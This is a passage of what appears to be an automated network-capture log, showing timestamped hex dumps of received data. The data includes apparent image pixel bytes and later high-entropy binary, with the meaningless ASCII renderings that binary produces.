00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 03 0e 20 14 06 5c 93 58
                                                      Data Ascii: u}qe|Sc}RGu32q 3n7n:o6n5n<o:o;p>qDtJtRvVv\tdvnvxuvutstsrrppmkgda^ZWSPMR_e(Rb0&q \X
                                                      2023-06-01 10:14:27 UTC117INData Raw: ff b8 87 b0 ff ac 86 a4 ff a8 6b 9b ff 93 91 94 ff 85 7e 85 ff 79 79 7a ff 8c 86 8e ff 71 67 71 ff 95 94 98 ff cb d0 d3 ff c8 cc d0 ff c8 cc d0 ff c9 cf d4 ff 9b 96 86 ff 96 70 38 ff 9b 77 42 ff ad 8e 63 ff 9f 83 5b ff 7e 65 44 ff 61 71 49 ff 42 63 43 ff 2b 29 2b ff 6c 55 36 ff 90 7b 5c ff 8e 86 7a ff 79 74 73 ff 7f 76 76 ff 8e 82 79 ff 9b 89 72 ff 73 6a 66 ff 54 49 3c ff 69 52 30 ff 8a 90 8e ff cb cf d4 ff c8 cc d0 ff cc cf d3 ff cd d0 d3 ff cc d0 d3 ff dc dd de ff b7 b5 b2 ff 82 7c 79 ff 66 63 67 ff 97 8b 7b ff b0 8d 5c ff c2 aa 85 ff d7 d8 da ff cb cf d3 ff cd d0 d4 ff cc d1 d6 ff ba b4 af ff 7c 48 1b ff 7a 41 0f ff 7b 42 11 ff 7c 42 11 ff 7c 43 12 ff 7a 43 12 ff 76 41 12 ff 73 40 11 ff 78 48 1b ff 86 56 2c ff 86 59 2f ff 61 35 11 ff 32 13 02 c1 06 05
                                                      Data Ascii: k~yyzqgqp8wBc[~eDaqIBcC+)+lU6{\zytsvvyrsjfTI<iR0|yfcg{\|HzA{B|B|CzCvAs@xHV,Y/a52
                                                      2023-06-01 10:14:27 UTC125INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 24 24 48 8a 8a 8a cd c7 c7 c7 ff d1 d1 d1 ff d3 d3 d3 ff d6 d7 d6 ff db db da ff e0 e0 e0 ff e5 e5 e5 ff e9 e9 e9 ff ef ef ee ff ee ee ee ff 8a 8a 8a ff 32 32 32 ff 2c 2c 2c ff 2a 2a 2a ff 29 29 29 ff 26 26 26 ff 26 26 26 ff 27 27 27 ff 28 28 28 ff 27 27 27 ff 22 22 22 ff 53 55 56 ff cc d0 d5 ff ce d2 d4 ff 68 76 a7 ff 21 3a 96 ff 86 b7 e3 ff 4d 7f a5 ff 7e ac d5 ff 1b 32 84 ff 61 73 9d ff cf d2 d4 ff ce d2 d8 ff 88 8a 8e ff 23 23 22 ff 2b 2b 2b ff 29 29 29 ff 2a 2a 2a ff 29 29 29 ff 23 23 23 ff 8d 90 92 ff ce d2 d7 ff c7 cd d1 ff 3a 4c 8f ff 55 59 9a ff b5 be c5 ff 51 83 a5 ff 68 90 c7 ff 0b 1c 7c ff 93 9f b8 ff ce d1 d4 ff c5 c9 ce ff 4a 4b 4c ff 1c 1c 1c ff 21 21 21 ff 21 21
                                                      Data Ascii: $$$H222,,,***)))&&&&&&'''((('''"""SUVhv!:M~2as##"+++)))***)))###:LUYQh|JKL!!!!!
                                                      2023-06-01 10:14:27 UTC133INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      2023-06-01 10:14:27 UTC140INData Raw: ff e6 94 2f ff cd 8c 28 ff bb 94 3d ff bc 94 3b ff bc 95 3b ff bc 97 3b ff bd 98 3b ff bc 93 2e ff bc 92 27 ff bb 8f 21 ff ba 94 25 ff bd 8e 21 ff c1 8e 2f ff bb 8e 18 ff b9 8e 15 ff b9 8e 15 ff b8 8f 15 ff b8 8e 13 ff b8 8f 14 ff b7 8e 13 ff b4 8d 12 ff b4 8d 11 ff b4 8d 11 ff b4 8c 11 ff b3 8b 10 ff b1 8a 0e ff b0 89 0f ff ae 88 0d ff ad 87 0c ff ad 86 0b ff af 85 0d ff b5 86 13 ff c4 89 21 ff d4 8e 2d ff d9 92 33 ff d7 91 33 ff c8 88 25 ff b2 7e 10 ff ac 7c 0a ff ae 7d 0b ff ac 7a 0a ff ab 79 09 ff b2 77 0a ff c4 74 09 ff c3 70 08 ff ba 6b 08 ff b1 66 08 ff a7 60 08 ff 9e 5b 07 ff 95 56 07 ff 8f 54 09 ff 98 60 19 ff a0 6a 26 ff 80 4c 0f ff 42 22 03 ba 03 04 05 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 03 05 1f 5e 37 08 b5 ba 75
                                                      Data Ascii: /(=;;;;.'!%!/!-33%~|}zywtpkf`[VT`j&LB"^7u
                                                      2023-06-01 10:14:27 UTC148INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 07 02 40 7b 4c 26 f4 ae 75 47 ff ab 6e 42 ff a7 69 3c ff a6 68 3a ff a6 67 39 ff a7 68 39 ff bc af a6 ff c5 cc cc ff ab 8e a6 ff 8d 76 88 ff 81 6a 7d ff 46 3d 45 ff 16 17 16 ff 1b 1c 1b ff 1c 1b 1b ff 1e 1e 1e ff 20 20 1f ff 21 21 20 ff 23 23 23 ff 24 24 24 ff 26 25 25 ff 27 27 27 ff 28 28 28 ff 2a 2a 2a ff 29 29 29 ff 2b 2b 2b ff 29 29 29 ff 29 29 29 ff 2a 29 29 ff 29 28 28 ff 29 29 29 ff 27 27 27 ff 28 28 28 ff 27 27 27 ff 25 25 25 ff 24 24 23 ff 23 23 23 ff 24 24 24 ff 21 21 21 ff 21 21 21 ff 1f 1f 1f ff 1f 1f 1f ff 1d 1d 1d ff 1c 1c 1c ff 1b 1b 1a ff 1a 1a 1b ff 19 1b 1d ff 16 1a 1c ff 4d 2f 19 ff 6e 3b 15 ff 6c 3c 1a ff 7e 50
                                                      Data Ascii: @{L&uGnBi<h:g9h9vj}F=E !! ###$$$&%%'''(((***)))+++))))))*)))(()))'''((('''%%%$$####$$$!!!!!!M/n;l<~P
                                                      2023-06-01 10:14:27 UTC156INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      2023-06-01 10:14:27 UTC164INData Raw: ff c1 81 30 ff bf 7d 28 ff c3 a8 86 ff cd d0 d6 ff b6 ab b6 ff ac 95 a9 ff b5 9a b2 ff a5 92 a2 ff 89 7d 88 ff 94 84 98 ff c9 af 87 ff db a8 5d ff b3 a4 88 ff 69 6d 6c ff 21 28 2c ff 24 29 2c ff 26 2b 2e ff 26 2c 2e ff 27 2c 2f ff 27 2b 2f ff 26 2c 2e ff 25 2a 2d ff 24 29 2c ff 21 27 2a ff 27 2d 30 ff 6b 77 80 ff ca ce d3 ff c8 cc d1 ff c8 cb d0 ff d4 d6 d8 ff c4 c3 c4 ff af ae ad ff 9a 9d a0 ff ab b0 b7 ff d0 d3 d6 ff c8 cc d0 ff ca d0 d7 ff a5 7b 50 ff 93 4c 05 ff 90 4e 0a ff 89 4b 0a ff 82 47 0a ff 7b 43 09 ff 77 42 0c ff 84 52 20 ff 81 52 22 ff 49 22 04 e0 0b 07 04 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 07 03 2f 83 51 1a e6 bf 84 3c ff be 81 38 ff ba 7d 30 ff bb 7d 2f ff bd 7d
                                                      Data Ascii: 0}(}]iml!(,$),&+.&,.',/'+/&,.%*-$),!'*'-0kw{PLNKG{CwBR R"I"(/Q<8}0}/}
                                                      2023-06-01 10:14:27 UTC172INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      2023-06-01 10:14:27 UTC179INData Raw: ff 1d 1d 1d ff 1a 1a 1a ff 19 19 19 ff 17 1b 1d ff 24 20 1d ff 65 37 16 ff 72 42 20 ff 7c 50 2f ff 32 17 08 b6 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 60 39 1f c8 b0 73 48 ff a3 68 3d ff 7d 50 30 ff 78 55 3e ff 80 7e 7f ff 68 66 69 ff 4f 4d 4f ff 3f 3e 3f ff 1f 1f 1f ff 23 23 23 ff 24 24 24 ff 27 27 27 ff 2a 2a 2a ff 2b 2b 2b ff 2c 2c 2c ff 2e 2e 2e ff 2d 2d 2d ff 2e 2e 2e ff 2f 2f 2f ff 2e 2e 2e ff 2f 2f 2f ff 2f 2f 2f ff 2d 2d 2d ff 2c 2c 2c ff 2b 2b 2b ff 29 29 29 ff 28 28 28 ff 27 27 27 ff 24 24 24 ff 21 21 21 ff 1e 1f 21 ff 3d 2a 1d ff 6d 39 15 ff 74 46 24 ff 75 49 2c ff 23 0e 04 91 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii: $ e7rB |P/2`9sHh=}P0xU>~hfiOMO?>?###$$$'''***+++,,,...---...///...//////---,,,+++)))((('''$$$!!!!=*m9tF$uI,#
                                                      2023-06-01 10:14:27 UTC187INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 01 80 00
                                                      Data Ascii:
                                                      2023-06-01 10:14:27 UTC195INData Raw: b6 73 52 ef f8 55 c6 bb d0 ba ec 86 ae fb 6d ab 3f ae 0a fb 94 81 46 f1 41 2d 87 1f f8 c1 79 58 f6 df 62 86 c9 e4 53 01 96 76 cc d3 c5 b7 5c 47 8c 31 de 82 45 49 06 8f 9a b5 e8 89 6f e7 e8 a4 39 61 43 f3 25 8b 93 fb 8c 14 70 be a3 aa b3 8e 20 f4 6e 30 fd c4 f3 d7 53 61 71 d2 3e 67 ec 74 48 e1 16 2d 9c be 53 9b 34 88 b5 08 d4 b4 9c d1 70 5a ff a2 17 58 81 29 f5 78 f0 36 82 88 d4 95 0c 69 a6 2b 6b b7 82 20 62 68 00 4e 6e 20 87 6f 40 48 eb 1b 9d 72 94 39 df 4d 2f ff 79 f3 c2 ed ca 97 aa 77 99 90 9d f8 78 1d 91 85 a9 7a 77 8c 76 a5 0f f8 fe 26 08 05 e8 5c a3 ec 80 98 fd ad c6 87 72 5a 4e f7 b7 b1 10 0a 6c f2 dd 9b bc 40 de c0 eb 3b 0d 25 86 bb 2b fd c6 9c 5a 54 ee 9d 98 17 4b 4f 25 5d 50 41 b6 d2 04 f4 e6 10 46 6a d3 27 d3 20 9b 87 4f bc 97 d5 80 2f 98 40 15
                                                      Data Ascii: sRUm?FA-yXbSv\G1EIo9aC%p n0Saq>gtH-S4pZX)x6i+k bhNn o@Hr9M/ywxzwv&\rZNl@;%+ZTKO%]PAFj' O/@
                                                      2023-06-01 10:14:27 UTC203INData Raw: a2 99 f1 2c 57 c9 be 8d b3 78 2c 95 27 c0 0c 70 1d b1 d1 df 43 7c ba 30 9d e4 ea 7f 27 4f 29 b4 cc 3c 6a 77 0e dd 44 08 e0 28 d1 d0 08 1b c5 16 90 e4 0b 6b dd 5d 3b 86 be ad 3e 67 e1 32 a8 51 02 ac 0f 69 17 17 7c 92 7d 38 5d 54 62 1b fa 0a f4 c7 0d 5d 18 97 7b 74 82 cb bb d6 35 b7 6f 4c 75 cf 42 28 46 20 e6 05 4a 3c b4 6b 23 92 2c 19 5b da af 21 6f 89 ec 78 e4 ad d3 63 4f 78 cd 71 5e ab 57 93 3b 2b d6 29 78 84 00 e8 9a 75 9d 53 2f ae 01 c5 16 22 0c ac 96 16 83 43 18 8d 6b 4a ed dd 54 56 8d 4f 9e be 85 a0 68 c4 ae cc c5 05 31 03 7c 5d e8 0e 5d e3 32 e3 79 e3 e7 17 77 39 d0 d8 56 60 4f df 2a 7b e2 af 2a ae 60 52 d5 54 0d 52 9a 6d 80 71 3b 5e 99 7f 21 13 d7 bf 43 6d c5 40 d1 cb 81 78 98 b7 fb 3b 29 c3 67 ec a8 5d 5d 56 26 fd a9 51 9b e8 69 a6 46 8d 92 2f 19
                                                      Data Ascii: ,Wx,'pC|0'O)<jwD(k];>g2Qi|}8]Tb]{t5oLuB(F J<k#,[!oxcOxq^W;+)xuS/"CkJTVOh1|]]2yw9V`O*{*`RTRmq;^!Cm@x;)g]]V&QiF/
                                                      2023-06-01 10:14:27 UTC211INData Raw: ef e2 f5 32 27 b2 4b 10 3d b1 4a 92 b2 8c 61 10 43 58 2e 7a b1 e8 a3 98 15 52 66 02 a2 ea b5 da e2 9b b3 17 f9 b7 50 2d 7e 18 42 fa 21 04 aa 8a 04 be 06 6c b5 19 83 0b c6 73 02 c4 b0 81 08 7e d1 0f 44 d9 74 82 d0 af 6d 21 19 2d 78 db 47 f1 59 2c f9 e1 d3 80 ef 41 a7 58 50 8e 92 8e 00 ad 04 2d 5e cc de 9d 14 38 15 f8 e2 e2 44 e4 07 27 71 aa 20 0a df b9 52 b0 b9 60 df 91 be b3 d3 a4 a4 10 93 ef ac 1c 22 cc bc 09 cc 76 5b ff 61 3b f8 d4 00 70 4a d4 03 65 30 84 e7 08 07 ba dd b8 e1 94 54 e0 4f d0 1f 26 8d 47 fb aa 27 a1 40 bc 4c f9 ac 64 a7 98 34 25 e5 11 b2 37 69 7d 50 95 25 2c 95 8f 42 cd 6a 68 d4 10 18 67 70 fd c3 ae 61 0b f4 a5 3d 72 22 19 bc 67 6b fc d5 b4 86 10 22 54 ee ac ba 8c 21 18 f7 9c 78 e5 75 2f f0 3f 41 a5 45 13 5e cf 9a ec 14 5f db 57 83 80 6a
                                                      Data Ascii: 2'K=JaCX.zRfP-~B!ls~Dtm!-xGY,AXP-^8D'q R`"v[a;pJe0TO&G'@Ld4%7i}P%,Bjhgpa=r"gk"T!xu/?AE^_Wj
                                                      2023-06-01 10:14:27 UTC219INData Raw: 5a 4c 86 19 0f 33 46 dc 4d e4 ce ef 88 b7 0f 5b 34 81 f3 7e 4b ed 9b 57 ef 10 71 7d c0 fb 4f c3 4b cb 19 77 84 ed be 5f 41 00 8e 1a 23 ad ef 49 d2 4d a2 97 1c aa a3 e3 d6 4a f8 aa c9 bd aa 31 ea 62 34 1f 8e ad 1b d6 fa 58 00 73 f5 51 f9 fd 0e 60 99 0f aa bb 9b fc f4 a1 38 57 b2 84 3b e9 a6 7b 1f 3c 50 f5 33 31 3e 1c 0b da 10 52 c9 5d 05 4b ca ae 03 7d 0b 93 4f 02 00 3e 34 b1 66 4b c0 7d 52 27 a0 6a 82 c9 80 27 bf 65 9b c8 3c 3a 91 87 eb 83 5b fa 4f 0f 1f 3a d7 31 57 c3 8d 75 bd 27 91 99 ee b1 f7 8b e3 3f a9 e4 53 f0 a9 29 fb 74 35 91 96 01 12 03 f7 b4 7e 62 f8 2b 7a b2 ed 56 de aa ca 5a 65 cc 78 9b ec f9 8b 21 da cb 5f 67 3a aa ed 68 92 9a 33 19 a8 82 49 2a bd 36 97 c6 b0 a7 03 9a f8 7f b1 2e 14 4d 32 4d f5 5e b3 a3 94 f6 7b b8 3e 16 46 88 5d 93 de 95 b2
                                                      Data Ascii: ZL3FM[4~KWq}OKw_A#IMJ1b4XsQ`8W;{<P31>R]K}O>4fK}R'j'e<:[O:1Wu'?S)t5~b+zVZex!_g:h3I*6.M2M^{>F]
                                                      2023-06-01 10:14:27 UTC226INData Raw: 3b 6c 56 25 fa 57 a0 9e f4 f0 2c 59 c5 74 2b 17 93 07 c4 fa d1 70 99 1a 59 2c 0d b3 29 81 37 d5 f5 79 51 38 8e 55 c7 20 79 ac cb e5 67 40 93 f1 7a 99 5d 5c dc b4 88 51 56 82 f6 f3 d6 ab 17 44 49 cb e4 ee 0b 1e fa 92 c1 33 38 77 75 a9 37 96 c8 a5 65 dd 21 76 d4 5f a9 22 9a e1 c9 4f 08 5e 75 e7 86 e8 4e 2c fd a3 a0 73 7d 8b 94 f4 8d 9b ad 15 07 c2 39 c3 77 0f b5 1a e2 b9 10 f3 68 76 be d5 de c5 a7 55 3b 11 37 24 37 cb 23 2a 20 5b 7b ef 2d 61 1c 9b 63 c9 27 b2 c0 94 c1 62 8d 22 93 47 25 0c 54 1b 6c fd 05 41 6d 14 6d 96 6d 95 6b 1b 92 9c d3 d1 a6 90 8a b5 c1 3f 05 88 89 93 e5 9b aa 49 1d d5 66 36 0a 80 e7 3a 32 b5 ee 59 5a ce 63 89 bf e6 26 26 f6 c6 2a 70 44 dd c1 ba 5d 72 08 b5 54 23 ba d9 b2 bf d6 fb a7 a8 ac 0b 31 59 d2 65 c6 d9 6d 69 31 16 82 e1 c3 26 ec
                                                      Data Ascii: ;lV%W,Yt+pY,)7yQ8U yg@z]\QVDI38wu7e!v_"O^uN,s}9whvU;7$7#* [{-ac'b"G%TlAmmmk?If6:2YZc&&*pD]rT#1Yemi1&
                                                      2023-06-01 10:14:27 UTC234INData Raw: e0 fb 87 c0 49 dc 32 fc 9d 3a 56 f5 c3 30 0a ad fc da 23 b7 34 53 90 4f 23 57 66 69 e8 14 af d3 44 f1 7d 99 7e 61 85 5f 82 03 3e b7 de c0 43 70 52 76 e9 a6 93 f8 69 48 c8 b9 ea 6e 16 a7 cd ca 82 af 13 28 fa 7b c0 f2 5e 7a 9e 0d 9d e3 17 e5 32 cf 1e 82 45 5e 4d 3d 1a 56 95 4a c0 52 e2 10 51 c4 5a 5a 35 d4 71 84 62 d9 13 b6 b2 dd ef c2 4c df 98 e1 8c c7 22 f7 e1 05 83 71 fa 8e ef 71 49 5f 48 e4 65 3c 12 ab a4 0d 33 83 e9 7b 76 0d be 14 3b ba 3e 33 1a ed 27 07 83 ea 2e ee 16 e9 bb d8 e9 ed 9a bc 65 0c ee 96 06 a7 46 16 b1 a4 ff cf 71 28 f0 3e 7b 9f 62 fd 8c 51 c6 70 51 0c 59 61 4a b3 2a b0 df 85 11 87 6e db 9f db 4c 28 fc fc d2 4d 3d 47 a9 d9 b3 f7 0c 1a 0c 1c 9c 94 67 00 69 9f 21 be c9 b6 b2 7c 6e 13 18 95 4c 26 e8 3f 8e 63 d2 c9 fa 0e de 45 9c e8 24 1b 3c
                                                      Data Ascii: I2:V0#4SO#WfiD}~a_>CpRviHn({^z2E^M=VJRQZZ5qbL"qqI_He<3{v;>3'.eFq(>{bQpQYaJ*nL(M=Ggi!|nL&?cE$<
                                                      2023-06-01 10:14:27 UTC242INData Raw: 7b d9 8a f1 a3 e6 7e f8 77 0e 79 87 74 3e 65 8d 44 bc 6b 7e 50 a6 4d ac ae b6 d6 4c 64 86 36 c8 29 de 7e de 3f 93 ac 46 83 ff 79 89 cb 9e cf 70 c5 7e f8 94 4a 01 59 b6 9c e8 cc b8 98 58 b7 3c 86 c5 b4 60 af 02 fa a6 6f b0 48 d4 d9 9a c5 16 30 e1 90 08 1e 15 f5 f5 9c c6 0e f6 7a 9a df f2 21 dc af ad 28 45 31 f8 a1 35 3a f4 be 63 e6 bc 84 4f d3 36 9c c4 19 d6 ea f9 90 c5 df 4c 80 75 8c f1 66 0c 58 64 d8 77 18 ff 33 60 07 d9 3c a2 2c 56 18 f1 a6 a1 b7 77 b5 f5 d7 3d 83 30 8a 04 f4 63 d7 5d bb cf 9d 4b 81 30 53 8c 52 d8 96 99 90 cb d3 97 3e 6b eb 82 ee b7 3d 12 50 b8 d2 38 4a 98 b7 e7 d4 a9 e0 7e 99 f7 f2 36 2e 2d 5c 1a f7 0c f7 ed c2 46 e4 fa 55 01 dd b2 ae e3 6b 19 46 67 3d 81 ca bb 7d ed 79 0c b2 69 d7 c1 0c 19 14 10 af ea 14 5c 34 5c ff 6f 08 ff 33 00 6e
                                                      Data Ascii: {~wyt>eDk~PMLd6)~?Fyp~JYX<`oH0z!(E15:cO6LufXdw3`<,Vw=0c]K0SR>k=P8J~6.-\FUkFg=}yi\4\o3n
                                                      2023-06-01 10:14:27 UTC250INData Raw: f8 fc c3 29 08 48 ec 83 78 9d 4d 5f 44 8e d1 c6 a3 2a 5f ca 58 d7 d8 bf 3e 87 10 d3 b2 53 b0 45 0c fd a5 6d 13 2c c7 52 b6 43 18 31 2d 1f f2 e9 33 26 ce 57 9a a6 58 4a 63 a9 73 bd 9c b9 a2 38 25 d3 43 ed 34 9f 4d 6f e5 53 4a 28 9c ff 37 07 c6 c1 26 9b e7 74 6b a8 b8 a4 6a e1 2c ee 61 16 76 1d 81 82 2b 11 d4 d9 7f 00 40 c4 23 d1 c3 d2 f6 02 e5 b8 11 8a 2d 7c 69 82 bd 33 17 7d e0 eb ca 1a f2 0f 82 81 79 d0 af 23 4b 7b d0 9d 14 87 c3 b9 85 ad b3 b5 5e 57 2a 10 f9 6f 08 02 f6 5c 99 5b 2e 47 3d b3 12 4a fc c8 ab 32 02 be 14 a2 26 66 e7 8c 27 8c 7a 1a df 83 4f f6 b8 be ed d6 be 2e bf 9c b7 9e c4 75 dc 19 14 69 3b 67 c4 99 97 09 91 b8 16 5b 79 c1 da 31 bd 0c ec dc 0e 91 e1 64 e5 23 65 71 b2 3a f4 0d d9 ea 2e e4 7d b8 d7 27 0e 11 b4 bf 76 fc 6a bb 9f 8e 15 eb aa
                                                      Data Ascii: )HxM_D*_X>SEm,RC1-3&WXJcs8%C4MoSJ(7&tkj,av+@#-|i3}y#K{^W*o\[.G=J2&f'zO.ui;g[y1d#eq:.}'vj
                                                      2023-06-01 10:14:27 UTC258INData Raw: 10 bb d1 c1 48 91 a8 c5 03 2d fa 0b f8 cf ba 9c 0e 94 7f 87 e0 cc 34 f4 c1 f3 8c c2 09 9b 82 5a 52 fe 18 91 0c dd a5 ac eb bf 9d cc 4a 20 3f 67 3a a5 71 c2 11 7b de 7d 94 f7 81 51 6e 90 77 b8 7c 80 c7 27 5f af bc f8 a4 46 84 95 5c 70 3c f1 a9 ab 22 20 90 a2 1e 02 f0 e5 c9 93 be 4b 31 ba 25 43 31 5a a5 b2 15 d6 c5 bc 1b 88 55 92 3a a8 8c 23 c2 0f 00 3d 6e 77 9e 01 21 d3 cf 02 2a f5 a6 02 8b d0 65 d6 9a 3d ca 12 30 c3 1b 05 a5 9d a2 45 54 7a 9b 58 fc bd 52 a1 5c 99 3e 38 b9 96 f0 9b c9 47 8d ef 9d 21 f9 7e 36 59 8d e8 1f b3 90 de 76 f6 b8 6d a6 c6 6a e1 0f ee 3c 59 93 4d ca 79 90 1c 1e e0 80 b7 3e 24 23 d1 bd 74 13 40 00 be fa e7 a7 94 67 c7 d2 42 56 aa ee c0 fa f6 e7 a5 5a 35 47 18 19 d0 ae 11 bf 75 78 00 56 de 0b 40 88 81 01 62 ff 4c 1d 45 9f b1 58 44 d4
                                                      Data Ascii: H-4ZRJ ?g:q{}Qnw|'_F\p<" K1%C1ZU:#=nw!*e=0ETzXR\>8G!~6Yvmj<YMy>$#t@gBVZ5GuxV@bLEXD
                                                      2023-06-01 10:14:27 UTC265INData Raw: 95 88 ff 63 a6 c3 a0 2e 7f f8 03 06 15 9d 98 cf b9 9f 48 97 c5 0a 92 3b 30 71 8c 5c 2e 30 9f b6 4d fe 46 a7 94 46 11 f4 2f 30 41 fc cd c8 64 a6 4d b5 f9 e0 dd 7b b2 65 5b a7 ca 7e dc 4b 2b d7 14 63 c2 59 fd 80 4d 48 89 88 bd f8 c0 d5 86 ef 43 1c 13 f5 c2 25 6d 94 c4 99 45 87 b6 09 1e d6 d7 7c 18 31 f8 0e 3f 36 62 0b 87 29 dc 45 43 9e 26 74 40 66 72 9a c8 28 ff 77 3f 33 a1 7a 5d e9 ab 91 b3 11 5f 3c b8 30 61 e0 8f 18 95 82 0a 7d af 64 b8 dc 24 33 d0 11 9b 9f f3 70 a4 dc 71 14 b6 a3 20 07 26 74 22 27 ca 05 3e b2 92 13 86 33 f9 81 55 ed f6 6e cf 96 1a 8a 28 d9 95 7a 2c 61 ff f8 aa e3 9f 70 27 29 58 2e d1 b5 d4 6b b5 fd fe 37 ef 0d 38 91 47 37 5f da 0a d7 c1 5c f7 49 b4 8e d1 66 4b ed ac 08 9e f0 fa bd 4b 96 b2 72 d6 eb 78 ae ed f4 f2 83 65 4e 56 5a 92 2e e6
                                                      Data Ascii: c.H;0q\.0MFF/0AdM{e[~K+cYMHC%mE|1?6b)EC&t@fr(w?3z]_<0a}d$3pq &t"'>3Un(z,ap')X.k78G7_\IfKKrxeNVZ.
                                                      2023-06-01 10:14:27 UTC273INData Raw: 0a fd 19 3a 6b 74 2f 05 bd b2 a0 f1 ac 41 cb 98 11 58 f3 2f cd 20 13 f2 df 0b f8 8d 1b 98 18 b8 fa 7f cc 2f b9 a9 87 44 67 9c 34 6d 2f 63 c6 4d d7 5b 1b 57 98 72 21 4b 58 cb 0f 28 4d cd 6d e9 74 aa a3 3b 91 f8 65 fc aa 0e 54 8a 2a 21 a2 14 17 d6 86 da 7c 6c e8 94 9a 40 d1 b1 b5 51 e1 3c d3 96 74 3e ba 03 66 4e b3 fc 95 e1 b0 c4 a9 87 e5 f9 a5 df 05 2d e7 1e 5f e8 dd a7 a9 00 39 38 da 19 9f 31 01 93 0a 77 1a d5 4e d5 47 8b 1f de 40 79 b7 ad e7 25 1b ba 80 30 e1 4b d3 6a f0 d6 c0 6b 5a 33 42 34 ed 73 92 a0 1b ee d1 2f a8 f8 4d fb b2 ee 10 58 af b5 8a d6 df 73 99 a2 e3 6b b7 50 82 c2 68 e0 36 92 ec 8d ef f7 0f 7e 76 a2 a1 37 eb a0 13 f2 f8 60 a2 7d 10 16 7c 2e 05 be 4c eb b9 47 d5 da 95 cc 68 c3 d4 f5 36 61 b4 23 8c f1 43 6b ae 80 05 67 e0 8c 6e 29 45 1a b6
                                                      Data Ascii: :kt/AX/ /Dg4m/cM[Wr!KX(Mmt;eT*!|l@Q<t>fN-_981wNG@y%0KjkZ3B4s/MXskPh6~v7`}|.LGh6a#Ckgn)E
